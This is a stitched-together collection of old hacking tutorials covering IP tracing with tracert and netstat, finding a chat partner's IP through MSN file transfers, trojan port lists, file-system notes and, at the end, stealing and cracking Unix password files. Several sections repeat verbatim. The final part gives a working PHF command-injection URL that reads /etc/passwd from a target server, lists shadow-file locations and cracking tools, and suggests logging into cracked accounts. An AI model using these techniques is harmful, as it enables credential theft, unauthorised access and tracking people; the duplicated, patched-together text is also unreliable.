13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]
14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]
15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]
16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]
Trace complete.
Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.
Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]
First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.
Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.
Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.
Firewall Detection
While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.
Example
Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :
c:\windows>tracert 64.4.53.7
Tracing route to lc2.law5.hotmail.com [64.4.53.7]
over a maximum of 30 hops:
1 * * * Request timed out.
2 161 ms 147 ms 85 ms 203.90.69.81
3 126 ms 261 ms 219 ms 203.90.66.9
4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]
5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]
6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]
7 826 ms 731 ms 819 ms 213.232.106.9
8 885 ms 744 ms 930 ms 213.166.3.209
9 851 ms 1020 ms 1080 ms 213.232.64.54
10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]
11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]
12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]
13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]
14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]
15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]
16 * * * Request timed out.
17 * * * Request timed out.
18 * * * Request timed out.
19 * * * Request timed out.
20 * * * Request timed out.
21 * * * Request timed out.
22 * * * Request timed out.
23 * * * Request timed out.
24 * * * Request timed out.
25 * * * Request timed out.
26 * * * Request timed out.
27 * * * Request timed out.
28 * * * Request timed out.
29 * * * Request timed out.
30 * * * Request timed out.
Trace complete.
I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.
Detecting Traceroute Attempts on your System
You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:
1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.
2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.
3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.
You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:
Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:
Address Class Dotted Decimal Notation Ranges
Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx
The various classes will be clearer after reading the next few lines.
Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.
In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".
A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as
"24's" and is commonly used by most ISP's.
Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.
Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:
xxx.xxx.zzz.yyy
where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.
***********************
For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?
So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.
This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.
In my country, say there are three main ISP’s:
ISP Name Network Address Allotted
ISP I 203.94.47.xx
ISP II 202.92.12.xx
ISP III 203.91.35.xx
Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.
Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.
Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.
Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :
Proto Local Address Foreign Address State
TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED
Now you got the IP address of hotmail ass 64.4.xx.xx .
Similarly you can figure out the IP address of most http or ftp connections.
To know your own IP type the following command in a dos windows
C:\netstat –n
[this commands converts the IP name into IP addresses]
this is what you will probably see on typing the above command :
Proto Local Address Foreign Address State
TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED
TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2
TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT
TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED
TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT
Here 203.xx.251.161 is your IP address.
Now lets clarify the format used by netstat :
Proto : It shows the type of protocol the connection with the remote system is using.
Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.
Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.
xxx.yyy.zzz.aaa:1024
in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system
Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like
C:\netstat
Proto Local Address Foreign Address State
TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED
Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.
Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.
Below I have produced a list of ports and popular services generally found to be running.
21 :: FTP port
80 :: http port
23 :: Telnet port
Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.
Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].
Netbus :: 12345(TCP)
Subseven :: 27374(TCP)
Girl Friend :: 21554(TCP)
Back Oriface :: 31337 (UDP)
Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.
How to get the IP of a remote system while chatting through msn messenger ::
This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.
The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.
To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:
Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:
The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.
Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.
Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b
[ftp://ftp.visualware.com/pub/vr/vr.exe]
Neotrace
[http://www.neoworx.com/download/NTX325.exe]
or by our way ie. Using MS DOS or any other version of DOS.
Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.
Let us take a look at tracert tool provided for DOS by Microsoft.
It is a very handy tool for peoples need to trace down an IP.
Just open any DOS windows and type tracert.
C:\windows>tracert
Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.
You will now see a description of the tracert command and the switches associated with it.
Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.
By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.
Now its time for execution.
Let us trace down the IP yahoo.com [216.115.108.243]
TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202
C:\WINDOWS>tracert yahoo.com
Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:
1 308 ms 142 ms 127 ms 203.94.246.35
2 140 ms 135 ms * 203.94.246.1
3 213 ms 134 ms 132 ms 203.94.255.33
4 134 ms 130 ms 129 ms 203.200.64.29
5 122 ms 135 ms 131 ms 203.200.87.75
6 141 ms 137 ms 121 ms 203.200.87.15
7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]
8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]
9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]
10 * * * Request timed out.
11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]
12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]
13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]
14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]
15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]
16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]
Trace complete.
Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.
Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]
First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.
Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.
Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.
Firewall Detection
While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.
Example
Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :
c:\windows>tracert 64.4.53.7
Tracing route to lc2.law5.hotmail.com [64.4.53.7]
over a maximum of 30 hops:
1 * * * Request timed out.
2 161 ms 147 ms 85 ms 203.90.69.81
3 126 ms 261 ms 219 ms 203.90.66.9
4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]
5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]
6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]
7 826 ms 731 ms 819 ms 213.232.106.9
8 885 ms 744 ms 930 ms 213.166.3.209
9 851 ms 1020 ms 1080 ms 213.232.64.54
10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]
11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]
12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]
13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]
14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]
15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]
16 * * * Request timed out.
17 * * * Request timed out.
18 * * * Request timed out.
19 * * * Request timed out.
20 * * * Request timed out.
21 * * * Request timed out.
22 * * * Request timed out.
23 * * * Request timed out.
24 * * * Request timed out.
25 * * * Request timed out.
26 * * * Request timed out.
27 * * * Request timed out.
28 * * * Request timed out.
29 * * * Request timed out.
30 * * * Request timed out.
Trace complete.
I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.
Detecting Traceroute Attempts on your System
You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:
1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.
2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.
3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.
You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:
Enable Right Clicks on The Sites That Disable it
Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.
It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.
You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.
It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.
You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.
Some Info About Windows File Systems
For most users running Windows XP, NTFS is the obvious choice. It's more powerful and offers security advantages not found in the other file systems. But let's go over the differences among the files systems so we're all clear about the choice. There are essentially three different file systems available in Windows XP: FAT16, short for File Allocation Table, FAT32, and NTFS, short for NT File System.
FAT16
The FAT16 file system was introduced way back with MS–DOS in 1981, and it's showing its age. It was designed originally to handle files on a floppy drive, and has had minor modifications over the years so it can handle hard disks, and even file names longer than the original limitation of 8.3 characters, but it's still the lowest common denominator. The biggest advantage of FAT16 is that it is compatible across a wide variety of operating systems, including Windows 95/98/Me, OS/2, Linux, and some versions of UNIX. The biggest problem of FAT16 is that it has a fixed maximum number of clusters per partition, so as hard disks get bigger and bigger, the size of each cluster has to get larger. In a 2–GB partition, each cluster is 32 kilobytes, meaning that even the smallest file on the partition will take up 32 KB of space. FAT16 also doesn't support compression, encryption, or advanced security using access control lists.
FAT32
The FAT32 file system, originally introduced in Windows 95 Service Pack 2, is really just an extension of the original FAT16 file system that provides for a much larger number of clusters per partition. As such, it greatly improves the overall disk utilization when compared to a FAT16 file system. However, FAT32 shares all of the other limitations of FAT16, and adds an important additional limitation—many operating systems that can recognize FAT16 will not work with FAT32—most notably Windows NT, but also Linux and UNIX as well. Now this isn't a problem if you're running FAT32 on a Windows XP computer and sharing your drive out to other computers on your network—they don't need to know (and generally don't really care) what your underlying file system is.
The Advantages of NTFS
The NTFS file system, introduced with first version of Windows NT, is a completely different file system from FAT. It provides for greatly increased security, file–by–file compression, quotas, and even encryption. It is the default file system for new installations of Windows XP, and if you're doing an upgrade from a previous version of Windows, you'll be asked if you want to convert your existing file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32 volumes to NTFS at any point. Just remember that you can't easily go back to FAT or FAT32 (without reformatting the drive or partition), not that I think you'll want to. The NTFS file system is generally not compatible with other operating systems installed on the same computer, nor is it available when you've booted a computer from a floppy disk. For this reason, many system administrators, myself included, used to recommend that users format at least a small partition at the beginning of their main hard disk as FAT. This partition provided a place to store emergency recovery tools or special drivers needed for reinstallation, and was a mechanism for digging yourself out of the hole you'd just dug into. But with the enhanced recovery abilities built into Windows XP (more on that in a future column), I don't think it's necessary or desirable to create that initial FAT partition.
When to Use FAT or FAT32
If you're running more than one operating system on a single computer, you will definitely need to format some of your volumes as FAT. Any programs or data that need to be accessed by more than one operating system on that computer should be stored on a FAT16 or possibly FAT32 volume. But keep in mind that you have no security for data on a FAT16 or FAT32 volume—any one with access to the computer can read, change, or even delete any file that is stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a network. So do not store sensitive files on drives or partitions formatted with FAT file systems.
FAT16
The FAT16 file system was introduced way back with MS–DOS in 1981, and it's showing its age. It was designed originally to handle files on a floppy drive, and has had minor modifications over the years so it can handle hard disks, and even file names longer than the original limitation of 8.3 characters, but it's still the lowest common denominator. The biggest advantage of FAT16 is that it is compatible across a wide variety of operating systems, including Windows 95/98/Me, OS/2, Linux, and some versions of UNIX. The biggest problem of FAT16 is that it has a fixed maximum number of clusters per partition, so as hard disks get bigger and bigger, the size of each cluster has to get larger. In a 2–GB partition, each cluster is 32 kilobytes, meaning that even the smallest file on the partition will take up 32 KB of space. FAT16 also doesn't support compression, encryption, or advanced security using access control lists.
FAT32
The FAT32 file system, originally introduced in Windows 95 Service Pack 2, is really just an extension of the original FAT16 file system that provides for a much larger number of clusters per partition. As such, it greatly improves the overall disk utilization when compared to a FAT16 file system. However, FAT32 shares all of the other limitations of FAT16, and adds an important additional limitation—many operating systems that can recognize FAT16 will not work with FAT32—most notably Windows NT, but also Linux and UNIX as well. Now this isn't a problem if you're running FAT32 on a Windows XP computer and sharing your drive out to other computers on your network—they don't need to know (and generally don't really care) what your underlying file system is.
The Advantages of NTFS
The NTFS file system, introduced with first version of Windows NT, is a completely different file system from FAT. It provides for greatly increased security, file–by–file compression, quotas, and even encryption. It is the default file system for new installations of Windows XP, and if you're doing an upgrade from a previous version of Windows, you'll be asked if you want to convert your existing file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32 volumes to NTFS at any point. Just remember that you can't easily go back to FAT or FAT32 (without reformatting the drive or partition), not that I think you'll want to. The NTFS file system is generally not compatible with other operating systems installed on the same computer, nor is it available when you've booted a computer from a floppy disk. For this reason, many system administrators, myself included, used to recommend that users format at least a small partition at the beginning of their main hard disk as FAT. This partition provided a place to store emergency recovery tools or special drivers needed for reinstallation, and was a mechanism for digging yourself out of the hole you'd just dug into. But with the enhanced recovery abilities built into Windows XP (more on that in a future column), I don't think it's necessary or desirable to create that initial FAT partition.
When to Use FAT or FAT32
If you're running more than one operating system on a single computer, you will definitely need to format some of your volumes as FAT. Any programs or data that need to be accessed by more than one operating system on that computer should be stored on a FAT16 or possibly FAT32 volume. But keep in mind that you have no security for data on a FAT16 or FAT32 volume—any one with access to the computer can read, change, or even delete any file that is stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a network. So do not store sensitive files on drives or partitions formatted with FAT file systems.
Password File And Encrypt Software
Introduction
Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one's fault but your own.
A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, passwd file should look something like this
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc
Out of that entire section the only name you could use would be rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc Heres how you read the File
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc
Username: rcc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for
anything like ftp, listen, bin, etc., etc. Occasionally
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root.
PHF Exploit
First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to.
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:
http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
In www.target.com Place who's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
Save the file as a text and keep it handy, because you will need it for later in the lesson.
FTP Passwd
The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like "etc, hidden, incoming, pub" goto the one called etc. inside etc should be a few files like "group, passwd" if any chance you see one called shadow there is a 8/10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
You have gotten one you can crack .
Shadowed Passwd's
Now if you happen to find a passwd fiel that looks something like this: "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
which has a user name, not a programs, you have a shadowed passwd. The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server of course) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out. Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name
UNIX Path Token
----------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files/
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/ / *
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be.
A unshadowing program Download Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it.
Crackers
A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. Download PaceCrack95
Download PaceCrack95
John the Ripper is the greatest, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don't need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a .DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works...
Wordlists
Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here:
ftp://ftp.ox.ac.uk/pub/wordlists/
If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with . There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashoned my own list of 4 digit numbers since people might use their phone number and well it worked .
What to do with a Cracked Passwd file
What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of their ports and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn't do that on account of how lame it is to destruct someones piece of work.)
